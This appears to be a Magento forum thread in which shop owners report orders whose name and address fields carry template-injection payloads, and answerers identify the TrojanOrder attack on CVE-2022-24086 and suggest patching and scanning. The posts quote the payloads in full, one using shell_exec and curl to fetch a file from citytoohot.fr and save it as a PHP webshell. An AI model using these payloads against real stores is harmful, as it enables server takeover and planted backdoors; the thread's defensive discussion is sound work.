# Code in place of customer name - Injection attack?

Tags: magento2

I recently had an order come through where code had been inserted into the customer's first name and second name.

This code was:

```
{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cd${IFS%??}
```

Is this an attempted attack?

What validation does Magento 2.4.3 CE provide to block code injection?

Comment: I also just had this happen recently. I'm going to be reaching out to support to see what they say about it. I can update here when I know more.

Answer (score 2):

1. You can add 'getTemplateFilter' to the list of banned keywords. You can also add citytoohot.fr in Fishpig security suite

Comment: How do you add to "Banned Keywords"? Where is this setting in Magento?

Comment: @artco how do we add to banned keywords?

Comment: I use Fishpig NOBOTS, originally to help with bots crashing the site on a not very good cpanel.

Comment: Sorry I have just read the question Nobots is a plugin it is not standard in Magento

Answer (score 0):

Me too this is the full address in the failed sale

{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php")}} Huevos
1 avenue
Los Angels, California, 90017
United States
T: 3455543453

DID YOU GET AN ANSWER/

Answer (score 0):

Summarizing what I found:

This attack tries to use two vulnerabilities:

- Code execution in e-mail templates, which is now patched in 2.4.3-p2
  [release notes](https://experienceleague.adobe.com/docs/commerce-operations/release/notes/security-patches/2-4-3-p2.html). This is the harmful part if not patched.
- Guest checkout via REST API is available even if that is disabled, and also anonymous guest web API call are disabled. There is a
  [GitHub Issue](https://github.com/magento/magento2/issues/36691) which is still open with **P1** high priority - follow it for code updates. This is less harmful other than annoying.

If this happened to you and there is curl and filename in the code, then check `/magento2/pub/` for the filenames in the code.
Also check the `access.log` for these filenames in the code, if the response was 404, then is should be ok.

Answer (score 0):

This is a "[TrojanOrder](https://sansec.io/research/trojanorder-magento)" attack for CVE-2022-24086. If you have patched or upgraded Magento to the latest supported release, this is merely an unsuccessful attack probe and you do not have to worry. See this [Magento version/security patch matrix](https://docs.google.com/spreadsheets/d/17w2TxP0Vw-ik45yNwVTW8orfoIKOXCtvBpIFvbEKiTY/edit#gid=0). However, if you have not upgraded Magento in time after Feb 2022, chances are that attackers managed to inject admin accounts and webshells into your system. It is recommended to run an ecommerce malware scanner such as eComscan, to find all traces of unauthorized access.

See also https://sansec.io/malware/citytoohot.fr